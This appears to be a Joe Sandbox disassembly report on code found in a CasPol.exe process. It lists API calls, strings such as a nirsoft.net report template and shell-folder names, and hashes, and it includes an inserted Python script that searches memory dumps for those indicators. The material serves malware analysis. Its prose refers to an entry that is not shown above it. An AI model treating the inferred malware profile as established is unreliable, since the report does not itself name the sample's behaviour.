                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
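The two function entries above list string indicators the analyzer found in the CasPol.exe image at 0x400000: a NirSoft HTML report template (the `http://www.nirsoft.net/` link line) and the shell-folder value names (`AppData`, `Common Startup`, ...). The following script is an added example, not part of the Joe Sandbox report, showing how to turn those "String ID" fields into an offline check against a raw memory dump and report where each hit lands. The report does not state whether the strings are stored as ASCII or UTF-16LE, so searching both encodings is an assumption; the sample dump embedded in the script is constructed, not taken from the analysis.

```python
"""Locate the string indicators listed in the report inside a raw memory dump.

Added example (not part of the Joe Sandbox report). Assumptions: the dump is the
0x400000-based image, and each indicator may be stored as ASCII or UTF-16LE.
"""
import re

# Strings copied verbatim from the report's "String ID" fields.
NIRSOFT_HTML = [
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
    "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
    '<table dir="rtl"><tr><td>',
]
SHELL_FOLDERS = [
    "AppData", "Common Desktop", "Common Programs", "Common Start Menu",
    "Common Startup", "Desktop", "Favorites", "Programs", "Start Menu", "Startup",
]
ENCODINGS = ("ascii", "utf-16-le")  # assumption: the report does not say which


def find_indicators(dump: bytes, image_base: int = 0x400000):
    """Return sorted (virtual_address, encoding, string) tuples for every hit.

    Hits fully nested inside a longer hit (e.g. "Startup" inside
    "Common Startup") are dropped so short names do not double-count.
    """
    raw = []
    for s in NIRSOFT_HTML + SHELL_FOLDERS:
        for enc in ENCODINGS:
            needle = s.encode(enc)
            for m in re.finditer(re.escape(needle), dump):
                raw.append((m.start(), m.end(), enc, s))

    kept = []
    for i, (a, b, enc, s) in enumerate(raw):
        nested = any(
            j != i and oa <= a and b <= ob and (ob - oa) > (b - a)
            for j, (oa, ob, _, _) in enumerate(raw)
        )
        if not nested:
            kept.append((image_base + a, enc, s))
    return sorted(kept)


def looks_nirsoft_derived(hits) -> bool:
    """True when at least one of the NirSoft HTML template strings is present.

    Shell-folder names alone are too generic to be meaningful; the HTML
    template with the nirsoft.net link is the discriminating indicator.
    """
    return any(s in NIRSOFT_HTML for _, _, s in hits)


def build_sample_dump() -> bytes:
    """Constructed sample dump (not real data): 0x100 bytes of padding, the
    nirsoft.net template as UTF-16LE, padding, then "Common Startup"."""
    buf = bytearray(b"\x00" * 0x100)
    buf += NIRSOFT_HTML[2].encode("utf-16-le")
    buf += b"\x00" * 0x40
    buf += "Common Startup".encode("utf-16-le")
    buf += b"\x00" * 0x20
    return bytes(buf)


if __name__ == "__main__":
    found = find_indicators(build_sample_dump())
    for va, enc, s in found:
        print(f"{va:08X} {enc:10} {s}")
    print("nirsoft-derived:", looks_nirsoft_derived(found))
```

Run it against a real `.sdmp` by replacing `build_sample_dump()` with `open(path, "rb").read()`; the addresses it prints are directly comparable to the `xrefs:` values in the report, which is a quick way to confirm that a dump you carved yourself is the same image the analyzer described.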
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                    • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
• Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
• Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
• Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
• Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
• Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
• Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
• Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
• Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
• Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
• Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
• Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
APIs
Strings
• too many attached databases - max %d, xrefs: 0042F64D
• cannot ATTACH database within transaction, xrefs: 0042F663
• unable to open database: %s, xrefs: 0042F84E
• out of memory, xrefs: 0042F865
• database %s is already in use, xrefs: 0042F6C5
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• database is already attached, xrefs: 0042F721
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
• memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
• memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                    Strings
